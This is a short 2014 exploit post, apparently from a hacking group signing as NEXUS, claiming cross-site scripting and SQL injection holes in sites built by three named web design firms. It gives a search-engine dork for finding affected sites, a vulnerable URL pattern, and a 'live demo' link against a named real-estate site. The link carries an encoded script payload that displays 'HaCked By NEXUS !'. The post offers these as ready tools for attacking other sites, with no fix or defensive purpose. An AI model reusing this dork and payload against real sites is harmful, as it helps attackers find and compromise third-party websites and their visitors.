Saturday, 5 July 2014

Pej Studio & Nissi Infotech & Plante Graffix - Cross Site Scripting (XSS)

Dork:
intext:"Created By Nissi Infotech"

Exploits:
http://target.com/name.php?id= [XSS & SQLI]

Live Demo:
http://www.jayapriya.com/realestate/projectdetail.php?id=42%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring